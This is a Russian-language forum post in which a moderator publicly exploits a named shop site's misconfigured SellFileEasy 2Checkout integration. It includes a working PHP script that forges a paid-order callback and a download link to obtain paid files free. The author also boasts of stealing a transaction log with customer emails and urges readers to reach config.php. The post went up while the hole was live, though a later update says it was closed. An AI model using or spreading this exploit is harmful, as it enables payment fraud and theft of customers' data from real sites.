Инструкция новичку Путеводитель по форуму Прокси для Telegram Показать подсказки , это бомба!

Почему нужно удалять неиспользуемые функции или новая жертва - open-cart.ru

mizaider

DevsAid Team
Команда форума
Модератор
18 Май 2016
60.021
4.401
Новая жертва - сайтец open-cart.ru.

Админ этого сайта вообще не стал заморачиваться и повесил для продажи архивов скрипт SellFileEasy. Купил он его или нет это другой и не интересный вопрос.
Сам по себе скрипт крепкий, но наш пациент опять же не стал заморачиваться с отключением ненужных платежных систем что и сыграло с ним злую шутку.

Оказалась включена платёжка 2Checkout и не просто включена, а значения секретных переменных, таких как секрет и id кошелька, были оставлены пустыми.
Не стоит никаких трудов получить секретный хеш и выдать себя за платежку чтобы сделать счёт оплаченным.

На коленке пишем скрипт:
PHP:
$co_password = "";
$sid = "";
$out_summ = '1000.00';
$hashOrder = md5('83659507df7f4323'.time());
$inv_id = md5('83659507df7f4323'.time());
$price = '1000.00';
$Shp_file = '600/Royal_2.1.x.zip';
$Shp_email = '[email protected]';
$my_crc = strtoupper(md5($sid.$inv_id.number_format($price, 2, '.', '').$co_password.$Shp_email.$Shp_file));
$StringToHash = strtoupper(md5($co_password . $sid . $hashOrder . $out_summ));

echo 'Сначала по этой ссылке<br>';
echo 'http://open-cart.ru/sellfileeasy/2checkout/result.php?total='.$out_summ.'&order_number='.$hashOrder.'&li_0_product_id='.$hashOrder.'&li_0_price='.$out_summ.'&li_0_file='.$Shp_file.'&li_0_email='.$Shp_email.'&li_0_checkout_sign='.$my_crc.'&key='.$StringToHash;
echo '<br>Теперь по этой<br>';
echo 'http://open-cart.ru/sellfileeasy/download.php?hash='.$my_crc.'&file='.$Shp_file;
$Shp_file = Это адрес файла, его видно в адресной строке на странице оплаты файла. (Да простит меня разработчик шаблона Royal)

Переходим по первой ссылке, потом по второй и усё, качаем файл.
Конкретно тут в архиве оказался текстовый файл с сылкой.
Снимок.PNG

Так же удалось стянуть файл transaction.log с списком всех транзакций. Вот кусочек.
Снимок.PNG

Если вы увидели там свою почту, то айяйяй :vinsent: все почты перекочевали в чёрный список панели лицензирования)
Можете попробовать добраться до файла config.php. Сами) :sarcastic_hand:

О уязвимости сообщено, но так как ресурс open-cart.ru не совсем честный, на момент публикации уязвимость работает.

Мораль. Не покупайте ничего в сомнительных местах и у сомнительных личностей) Или хотя-бы пользуйтесь одноразовыми почтами.
 
Последнее редактирование:

mizaider

DevsAid Team
Команда форума
Модератор
18 Май 2016
60.021
4.401
Не совсем понятно,где эта панель?
Этой панелью пользуются разработчики и собственно только они имеют туда доступ.
Попасть в черный список не страшно, просто твоя почта в списке лицензий разработчика будет подсвечена красным, никаких санкций или ограничений это не несет, не переживай)
 

mizaider

DevsAid Team
Команда форума
Модератор
18 Май 2016
60.021
4.401
UPD
Одмин сего ресурса вместо того чтобы исправить уязвимость и сказать "Спасибо" после того как я ему о ней сообщил, поступил по мудацки и заблочил ip прокси через который я работал с его ресурсом :clapping:
Уязвимость работает.
Закрой дыру блеать! :punish:
 
UPD
Админ реабилитировался закрыв дыру и сказав спасибо. Будьте внимательны.
 
Ваш e-mail не будет опубликован. Он потребуется для подтверждения Вашего поста.
Оформление текста Нажмите «Ввод», чтобы отправить ответ.

Привет!

Мы группа людей которые решили помочь другим в решении их проблем, а так же пользователям с поиском самых свежих и качественных инфопродуктов. За 4 с небольшим месяца мы создали этот форум на который заходят ежедневно тысячи человек и посещаемость постоянно растёт. Мы создали панель лицензирования для защиты PHP скриптов от воровства и SEO панель для мониторинга наших сайтов и выбора верной стратегии их развития. Мы надеемся что то что мы создали пригодится Вам и возможно Вы поможете нам развиваться и совершенствоваться вместе с Вами.

Статистика форума

Темы
337.479
Сообщения
359.806
Пользователи
25.417
Новый пользователь
Vasya_Pupkin

Приложения форума для iOS и Android


У ркн там нет власти ;)
Гостевуха
Помощь Пользователи
  • Captain @ Captain:
    @mizaider, ты там живой?
    Цитата
  • K Chat Bot:
    Гость kkifkaa присоединился к комнате.
  • K (Гость) kkifkaa:
    Всем привет!
    Цитата
  • K (Гость) kkifkaa:
    mizaider тут есть?
    Цитата
  • K Chat Bot:
    Гость kkifkaa присоединился к комнате.
  • K (Гость) kkifkaa:
    Здравствуйте уважаемые члены форума. Подскажите пож-та, что можно сделать если я был заблокирован якобы за: «Вы были заблокированы по следующей причине: Копирование материалов на другие ресурсы». Самое страшное, то что тебя обвиняют и не дают возможность пообщаться и разобраться в причинах. Кстати в такой ситуации может быть каждый из нас. Вот так стараешься размещаешь тут материал, а тебя без разбирательств в бан. И нет возможности обратится в тех поддержку т.к. твой аккаут заблокирован. Подскажите пож-та, как можно связаться с администрацией, чтобы была проведена проверка? Сейчас я новичок и как раз в этот день для нас заливал на форум новые курсы (один залил, второй не успел). Я сначала подумал, что какой-то запрещений материал разместил, а потом понял, что меня обвинили в том, что я не делал.
    Цитата
  • K (Гость) kkifkaa:
    mizaider ты здесь помоги пожалуйста!
    Цитата
  • mizaider @ mizaider:
    Вопрос решен.
    Цитата
  • goodness @ goodness:
    Добрый вечер уважаемые форумчане!)
    Цитата
  • goodness @ goodness:
    Вопрос к администрации: Имеется одна точка доступа wifi на квартиру, вашим форумом пользуюсь пока что только я, но хотел бы зарегистрировать и свою девушку,
    Цитата
  • goodness @ goodness:
    система нас не забанит из-за того что мы с одной точки доступа но с разных устройств?
    Цитата
  • mizaider @ mizaider:
    Не забанит
    Цитата
  • Captain @ Captain:
    Батя в здание
    Цитата
  • 13SASHA13 @ 13SASHA13:
    Цитата
  • Uggi Chat Bot:
    Uggi покинул(а) комнату.
  • M Chat Bot:
    mr_robot_i2p покинул(а) комнату.
  • Captain @ Captain:
    Батя в здание
    Цитата
  • J Chat Bot:
    joker567 покинул(а) комнату.
    J Chat Bot: joker567 покинул(а) комнату.